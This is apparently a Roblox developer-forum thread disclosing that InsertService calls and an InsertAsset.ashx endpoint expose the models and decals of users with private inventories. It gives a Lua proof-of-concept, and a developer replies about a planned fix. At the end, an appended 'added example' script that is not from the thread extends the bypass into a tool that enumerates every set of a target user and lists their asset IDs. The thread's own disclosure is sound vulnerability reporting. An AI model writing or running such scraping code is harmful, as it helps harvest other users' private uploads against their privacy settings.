This code snippet is an example of InsertService bypassing user privacy settings to return asset IDs and information:

```lua
local userid = 123 -- target user ID (placeholder)

-- Recursively serialises a table into a string so the result can be printed
function dump(o)
	if type(o) == 'table' then
		local s = '{ '
		for k, v in pairs(o) do
			if type(k) ~= 'number' then k = '"' .. k .. '"' end
			s = s .. '[' .. k .. '] = ' .. dump(v) .. ','
		end
		return s .. '} \n'
	else
		return tostring(o)
	end
end

-- Returns the user's sets regardless of their inventory privacy setting
local sets = game.InsertService:GetUserSets(userid)
-- sets[1] = models, sets[2] = decals
print(dump(game.InsertService:GetCollection(sets[1].CategoryId)))
```
Loading a private asset into Studio thankfully doesn’t work; however, the API will still retrieve “private” information.
This is allowing users to create Discord scraper bots, websites, etc., leaking personal assets as they’re uploaded. The only alternative currently to avoid leaking is to upload assets to an alternate account. I imagine this is a known issue, but I’ve received a large influx of messages/reports about this recently.
I’ve seen reports of this method working for uploaded decals, models and meshes*. This code snippet is capable of retrieving these categories for any user despite inventory settings.
*edit: unsure if this exact method is being used for meshes, but I have been sent lists of scraped meshes from my inventory
It seems that this can also be used by a web API endpoint, specifically https://www.roblox.com/Game/Tools/InsertAsset.ashx?sid=SETID
The negative set numbers work with this, so if you get someone’s private set ID via Studio (the API endpoint for that seems to have been closed previously), then you can always use the above endpoint to see their latest assets.
Currently in the product we don’t really have a notion of asset privacy. The account setting which makes your inventory private is really misleading. The good news is we are working on implementing this in a proper sort of way where even if someone guesses an assetId they won’t be able to use it without authorization. Once that goes live, issues like this will be moot.
I hope this doesn’t apply to existing assets (at least existing decals and solid models), because if it does it may break old games which rely on the use of off-sale assets created by other people.
Quick question that comes to mind on the other end of this: will assets (old and new) from users with public inventories continue to be usable after this update as they are now? I would’ve assumed that this new implementation would be just for users with private inventories, but just to confirm?
Please note that even if a user has their inventory marked as public, that does not mean you have the right to use their assets. The TOS clearly mentions a user has to denote whether their asset is free for public use.
To legitimately use an asset you do not own, the asset has to be marked as Free. You cannot use Decals/Audio/etc. by other users if they are not marked as Free. When the feature Seranok mentions above is implemented, it will likely prevent you from using non-Free assets that are publicly visible on the site, but that’s fine since you are not meant to be using these anyway.
Just testing and confirming here - this only works with models and decals, so other types of assets you’ve uploaded with a private inventory should be fine (e.g. audio). In this manner, it’s not a complete bypass, just for two categories of your inventory.
Your models and decals are counted as user sets (I’m not sure why this is the case and it doesn’t really matter either). All other sets that may appear in this list are actually from a very old feature that was sunset 3 years ago, sets. Check Sunsetting Sets for details. Found out by dumping my own inventory and finding sets that I subscribed to at least 6 years back or more.
Just for anyone concerned that this can be used to dump other assets. This method can only fetch models and decals as well as sets you’ve created or subscribed to when the Sets feature existed.
It appears that for users created after Sunsetting Sets you will get a LuaWebService error when you try to dump the set (this comes from the GetCollection call).
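As an added example (not code from any post in this thread), the script below covers both the original snippet and the observations just above: it walks every set that GetUserSets returns for a user rather than only sets[1], wraps each GetCollection call in pcall so the LuaWebService error reported for newer accounts is recorded instead of aborting the loop, and keeps only the asset IDs and names per set. Only CategoryId appears in the thread; the set field Name and the collection entry fields AssetId and Name are assumed from the InsertService API, and the user ID is a placeholder.

```lua
-- Added example: enumerate every set InsertService returns for a user and
-- list the asset IDs in each, tolerating the LuaWebService error that
-- GetCollection raises for some accounts. Run from the Studio command bar.
local InsertService = game:GetService("InsertService")

local TARGET_USER_ID = 123 -- placeholder user ID, replace before running

-- Returns a table keyed by set name; each value is a list of
-- { AssetId = ..., Name = ... } entries, or an error string when
-- GetCollection failed for that set. Returns nil, err if GetUserSets fails.
local function enumerateUserSets(userId)
	local ok, sets = pcall(function()
		return InsertService:GetUserSets(userId)
	end)
	if not ok then
		return nil, "GetUserSets failed: " .. tostring(sets)
	end

	local result = {}
	for index, set in ipairs(sets) do
		-- Set fields other than CategoryId are assumed from the API
		local setName = set.Name or ("set#" .. index)
		local fetched, collection = pcall(function()
			return InsertService:GetCollection(set.CategoryId)
		end)
		if fetched then
			local entries = {}
			for _, item in ipairs(collection) do
				-- AssetId / Name field names are assumed from the API
				table.insert(entries, { AssetId = item.AssetId, Name = item.Name })
			end
			result[setName] = entries
		else
			-- e.g. the LuaWebService error seen for accounts created after Sets were sunset
			result[setName] = "error: " .. tostring(collection)
		end
	end
	return result
end

local sets, err = enumerateUserSets(TARGET_USER_ID)
if not sets then
	warn(err)
else
	for setName, entries in pairs(sets) do
		if type(entries) == "string" then
			print(setName, entries)
		else
			print(setName, #entries .. " assets")
			for _, entry in ipairs(entries) do
				print("  ", entry.AssetId, entry.Name)
			end
		end
	end
end
```

Because every call is wrapped in pcall, a set that errors (the case described for accounts created after Sets were sunset) shows up as an "error:" line next to the sets that did return, which makes it easy to confirm for a given account exactly which categories the bypass exposes.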